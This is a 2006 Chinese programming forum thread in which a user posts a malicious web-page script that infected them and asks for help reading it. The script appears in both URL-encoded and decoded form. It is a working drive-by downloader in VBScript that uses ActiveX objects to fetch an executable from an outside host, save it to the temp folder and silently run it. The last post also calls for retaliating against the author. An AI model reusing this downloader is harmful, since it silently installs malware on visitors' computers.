标题:我中了网页病毒,这里是代码,有能看懂的吗
只看楼主
盖茨他爹
Rank: 6Rank: 6
等 级:贵宾
威 望:28
帖 子:5255
专家分:0
注 册:2005-5-3
 问题点数:0 回复次数:4 
我中了网页病毒,这里是代码,有能看懂的吗
<SCRIPT>var Words="%3Chtml%3E%0D%0A %3Cscript language%3D%22VBScript%22%3E%0D%0A    on error resume next%0D%0A    dl %3D %22http%3A%2F%2Fwww%2Eac66%2Ecn%2F88%2Frpp%2Eexe%22%0D%0A    Set df %3D document%2EcreateElement%28%22object%22%29%0D%0A    df%2EsetAttribute %22classid%22%2C %22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A    str%3D%22Microsoft%2EXMLHTTP%22%0D%0A    Set x %3D df%2ECreateObject%28str%2C%22%22%29%0D%0A    a1%3D%22Ado%22%0D%0A    a2%3D%22db%2E%22%0D%0A    a3%3D%22Str%22%0D%0A    a4%3D%22eam%22%0D%0A    str1%3Da1%26a2%26a3%26a4%0D%0A    str5%3Dstr1%0D%0A    set S %3D df%2Ecreateobject%28str5%2C%22%22%29%0D%0A    S%2Etype %3D 1%0D%0A    str6%3D%22GET%22%0D%0A    x%2EOpen str6%2C dl%2C False%0D%0A    x%2ESend%0D%0A    fname1%3D%22g0ld%2Ecom%22%0D%0A    set F %3D df%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29%0D%0A    set tmp %3D F%2EGetSpecialFolder%282%29 %0D%0A    fname1%3D F%2EBuildPath%28tmp%2Cfname1%29%0D%0A    S%2Eopen%0D%0A    S%2Ewrite x%2EresponseBody%0D%0A    S%2Esavetofile fname1%2C2%0D%0A    S%2Eclose%0D%0A    set Q %3D df%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%22%29%0D%0A    Q%2EShellExecute fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A    %3C%2Fscript%3E%0D%0A    %3Chead%3E%0D%0A    %3Ctitle%3EOh%2Cmy god%21   Goldsun%5Bat%5D84823714%3C%2Ftitle%3E%0D%0A    %3C%2Fhead%3E%3Cbody%3E%0D%0A%09%3Ccenter%3EYou DO it%21%3C%2Fcenter%3E%0D%0A    %3C%2Fbody%3E%3C%2Fhtml%3E%0D%0A";document.write(unescape(Words))</SCRIPT>
搜索更多相关主题的帖子: 网页 Set 代码 resume str 
2006-08-23 18:07
论坛
Rank: 3Rank: 3
等 级:新手上路
威 望:6
帖 子:1372
专家分:0
注 册:2006-3-27
得分:0 
..................

日出东方,唯我不败! 做任何东西都是耐得住寂寞,任何一个行业要有十年以上的积累才能成为专家
2006-08-23 18:17
渚薰
Rank: 6Rank: 6
等 级:贵宾
威 望:22
帖 子:1132
专家分:0
注 册:2006-8-6
得分:0 
%XX
这样的编码方式是URL编码
可以把
Words引用的那串字符串用
Server.HTMLEncode(Words)输出来一下,就看得懂什么了

个人ajax技术专题站: " target="_blank">http://www. 我不会闲你烦,只会闲你不够烦!
2006-08-23 18:42
盖茨他爹
Rank: 6Rank: 6
等 级:贵宾
威 望:28
帖 子:5255
专家分:0
注 册:2005-5-3
得分:0 

大体转换了一下,红色部分本来是一行的,为了阅读方便,我给拆开成了很多行。

[QUOTE]<SCRIPT>
var Words="<html>
<script language='VBScript'>
on error resume next
dl = 'http://www.ac66.cn/88/rpp.exe'
Set df = document.createElement('object')
df.setAttribute 'classid', 'clsid:BD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36'
str='Microsoft.XMLHTTP'
Set x = df.CreateObject(str,'')
a1='Ado'
a2='db.'
a3='Str'
a4='eam'
str1=a1%26a2%26a3%26a4
str5=str1
set S = df.createobject(str5,'')
S.type = 1
str6='GET'
x.Open str6, dl, False
x.Send
fname1='g0ld.com'
set F = df.createobject('Scripting.FileSystemObject','')
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject('Shell.Application','')
Q.ShellExecute fname1,'','','open',0
</script>
<head>
<title>Oh,my god! Goldsun[at]84823714</title>
</head><body>
%09<center>You DO it!</center>
</body></html>
";
document.write(unescape(Words))</SCRIPT>[/QUOTE]

2006-08-23 18:44
盖茨他爹
Rank: 6Rank: 6
等 级:贵宾
威 望:28
帖 子:5255
专家分:0
注 册:2005-5-3
得分:0 
好像最终是去这个网站的,我对shell不懂

http://www.g0ld.com/

刚才我打开了,好像有病毒,会突破XP SP2限制弹出窗口,然后引诱人安装一种软件,国外的,谁有能力给这个家伙点颜色看看。
2006-08-23 18:46



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-85755-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.132889 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved